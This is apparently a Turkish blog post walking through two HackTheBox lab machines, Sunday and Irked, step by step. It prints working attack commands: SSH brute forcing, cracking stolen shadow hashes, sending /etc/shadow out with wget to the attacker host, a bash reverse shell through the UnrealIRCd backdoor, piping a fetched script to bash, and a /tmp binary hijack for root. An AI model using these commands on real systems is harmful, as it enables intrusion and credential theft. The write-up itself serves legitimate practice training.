HackTheBox Günlükleri 2 | 2 Unix Machines Walkthrough TR

Alican Kiraz
4 min readJan 26, 2021

--

HackTheBox yazı serisine Unix makinelerden devam etmek istedim. Ikinci yazıda yine birbirinden farklı 2Unix makineyi çözümleyeceğiz;

  • Sunday
  • Irked

1.Sunday

Ilk olarak makine de yüzeysel Nmap Script ve Versiyon taraması yapalım;

nmap -sC -sV -oA bashed 10.10.10.76

Nmap’in ilk çıktısı

79 ve 111 Portları açık, bunları cebe atıp bu kez full port taraması yapalım;

nmap -p- 10.10.10.76

Bu seferde unknown olarak 22022, 35342, 56272 bulduk. Şimdi elde ettiğimiz portlar özelinde tarama atalım;

nmap -sC -sV -p 79,111,2202,35342,56272 10.10.10.76

Port özelinde tarama

Finger’da Sun Solaris Fingerd olduğunu gördük. Finger Enumeration için python script’i çalıştıralım;

./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76 |less -S

pts/3'de sunny çıktı. Birde root özelinde bakalım;

./finger-user-enum.pl -u root -t 10.10.10.76

Ve evet! pts/3 için sundat çıktı birde. Şimdi 22022'e sunny kullanıcısıyla ssh yaparak sunday pass’ini deneyelim;

ssh sunny@10.10.10.76 -p 22022

Ya da;

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p22022

Ve bağlandık! Olurda finger enum etmeseydik ve brute force yapmak isteseydik;

patator ssh_login host=10.10.10.76 port=22022 user=sunny password=FILE0 0=/usr/share/seclists/Passwords/probable-v2-top1575.txt persistent=0 ignore:fgrep=’failed.’

Şimdi sudo yetkisiyle sunny’nin çalıştırabildiği process’lere bakalım;

“ sudo -l “ ile kontrol ettiğimizde;

Şifresiz olarak /root/troll ile kullanabileceğimizi söylüyor. Bizde;

sudo /root/troll

geçtik. Ve Klasörleri gezmeye başladık. Burda / dizinin altında /backup bulduk. Incelediğimizde;

ls -la

cat shadow.backup

Sammy ve Sunny’nin hash’lerini bulduk. Şimdi kırmaya çalısalım ssh kracken ile bunun için sammy’nin hash’ini “ kir “ diye bir dosya oluşturup içine atalim ve hashcat te bu hash tipii bulalım;

Bulduk 7400! Şimdi kıralım;

./hashcat -m 7400 kir /opt/wordlist/rockyou.txt

Şimdi bulduğumuz cooldude! şifresiyle;

sudo sammy

geçtik. Şimdi sudo yetkisiyle sammy’nin çalıştırabildiği process’lere bakalım;

Wget ile root yetkisinde çalışabildiğimizden Wget ile shadow’u çekelim;

nc -lvp 80

sudo /usr/bin/wget — post-file=/etc/shadow 10.10.14.23

Ardından root ile sammy’nin hashini değiştirelim ve üstüne yazalım;

sudo /usr/bin/wget 10.10.14.6/shadow -O /etc/shadow

Yada yine root’un hash’ini kir2 olarak bi dosyaya atıp;

./hashcat -m 7400 kir2 /opt/wordlist/rockyou.txt

Kırıp Root olabiliriz!

2. Irked

Ilk olarak makine de yüzeysel Nmap Script ve Versiyon taraması yapalım;

nmap -sC -sV -oA bashed 10.10.10.117

22, 80 ve 111 açık gözüküyor.

Birde tüm portlara bakalım. Burda 8067'i bulduk.

Bizde bu UnrealIRC için zafiyetlere bakalım;

searchsploit Unreal

Şimdi bu zafiyetlerden backdoor’un Non-Msf’siz halini araştıralım;

Burda karşımıza çıkan makaledeki exploit’i trigger edelim;

Bunun ilk için ilk terminale dinleyici açalım;

ncat -lvnp 9001

Ikinci terminale trigger komutunu girelim;

echo “AB; bash -c ‘bash -i >& /dev/tcp/10.10.14.3/9001 0>&1’” |ncat 10.10.10.117 8067

Ve shell aldık!

Ilk olarak python shell yükleyelim;

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Peşine dizinleri araştıralım. Burda dikkatimizi ircd klasörü çekti. Ondan bash_history dosyasına bakalım;

cat .bash_history | less

Burda dikkatimizi home/djmardov çekti, klasöre gidince elle tutulur bişey yok. Içerideki dosya ve klasörleri listeleyelince;

. -ls

Dikkatimizi /home/djmardov/Documents içinde .backup çekti. Inceleyince içinde bir key bulduk!

Bunu not alalım. Peşine WEb’e bakınca bir resim çıktı.

Bu resmi stenografi edelim;

curl http://10.10.10.117/irked.jpg -o irked.jpg

steghide extract -sf irked.jpg

Şifre sordu. Bulduğumuz key’i deneyelim;

steghide extract -sf irked.jpg -p <backup’daki kelime>

Ve pass.txt çıktısı verdi! Şifreyi alıp djmardov ile ssh yapalım;

ssh djmardov@10.10.10.117

Ve giriş yaptık!

Dizinleri kontrol edince bir şey bulamadık. Ondan LinEnum atalım;

python -m SimpleHTTPServer 80

Sonra bu shell’i çekelim;

curl 10.10.14.23:8000/LinEnum.sh | bash

Ama çalıştırınca ilk başta birşey bulamasakta dikkatimizi viewuser çekti;

Inceleyince baktık ki viewuser “ /tm/listusers” ı çalıştırıyormuş. O nedenle bizde listuser’ı editleyelim;

nano /tmp/listusers

İçerisine;

#!/bin/bash

/bin/bash

Ardından yetki verip viewuser’ı çalıştıralım;

chmod +x /tmp/listusers

viewuser

Çağırınca shell geldi!

--

--

Alican Kiraz
Alican Kiraz

Written by Alican Kiraz

Head of Cyber Defense Center @Trendyol | CSIE | CSAE | CCISO | CASP+ | OSCP | eCIR | CPENT | eWPTXv2 | eCDFP | eCTHPv2 | OSWP | CEH Master | Pentest+ | CySA+

No responses yet